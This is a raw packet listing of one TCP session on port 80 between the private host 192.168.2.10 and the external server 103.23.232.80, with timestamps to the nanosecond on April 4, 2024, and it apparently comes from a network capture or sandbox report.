Apr 4, 2024 17:49:06.842241049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842255116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842259884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842278004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842310905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842329979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842349052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842381001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842478991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842495918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842557907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842603922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842624903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842648029 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842691898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842725039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842727900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842806101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842837095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842860937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842892885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842911005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842925072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842936039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842983961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842994928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843013048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843030930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843048096 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843050957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843069077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843103886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843121052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843139887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843158960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843163013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843178988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843195915 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843247890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843266964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843285084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843318939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843338013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843355894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843381882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843396902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843405008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843440056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843483925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843499899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843516111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843518972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843539953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843559027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843662977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843673944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843719006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843755960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843786001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843797922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843813896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843832016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843847036 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843849897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843868971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843868971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843921900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843941927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.843943119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843983889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.843998909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844017029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844034910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844068050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844072104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844124079 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844125986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844142914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844157934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844188929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844193935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844242096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844258070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844275951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844294071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844299078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844319105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844351053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844361067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844408989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844429016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844449997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844459057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844474077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844492912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844510078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844513893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844532013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844542980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844578028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844611883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844611883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844630957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844665051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844676018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844691992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844706059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844729900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844746113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844779015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844806910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844821930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844841003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844852924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844873905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.844964981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.844981909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845000982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845019102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845032930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845037937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845057011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845067978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845074892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845092058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845093966 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845132113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845163107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845189095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845211983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845230103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845247030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845262051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845269918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845278978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845308065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845319033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845338106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845355034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845372915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845376968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845410109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845423937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845453024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845458031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845478058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845493078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845496893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845519066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845571995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845591068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845608950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845613956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845643997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845658064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845663071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845680952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845699072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845699072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845737934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845753908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845772028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845799923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845805883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845837116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845846891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845874071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845877886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845911980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.845915079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845952988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845989943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.845993996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846009970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846048117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846079111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846096992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846131086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846187115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846203089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846220970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846239090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846240044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846259117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846275091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846316099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846349001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846357107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846368074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846388102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846410036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846411943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846445084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846462965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846478939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846488953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846498013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846508980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846566916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846580029 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846581936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846601009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846623898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846642971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846664906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846679926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846698046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846714973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846714973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846755981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846755981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846771955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846791983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846837044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846853971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846873999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846950054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846965075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846968889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.846985102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.846996069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847002983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847018003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847021103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847090006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847109079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847126961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847126961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847147942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847146988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847178936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847208023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847215891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847232103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847266912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847289085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847315073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847332001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847348928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847383976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847400904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847403049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847420931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847435951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847456932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847544909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847562075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847577095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847580910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847600937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847599983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847620010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847634077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847644091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847661018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847676992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847692013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847714901 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847714901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847733021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847750902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847765923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847803116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847839117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847837925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847858906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847877026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847891092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847914934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847929955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847949028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.847963095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.847986937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848023891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848048925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848067045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848083973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848087072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848104954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848124027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848126888 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848172903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848179102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848201036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848237991 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848246098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848265886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848284006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848298073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848303080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848321915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848354101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848377943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848397017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848414898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848417997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848453045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848453045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848489046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848506927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848526001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848540068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848562002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848581076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848596096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848613977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848632097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848635912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848665953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848705053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848748922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848764896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848849058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848851919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848886967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848902941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848920107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848932028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.848932981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848956108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.848990917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849024057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849040985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849050999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849077940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849082947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849093914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849107027 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849117041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849137068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849172115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.849174976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.849208117 CEST	80	49730	103.23.232.80	192.168.2.10
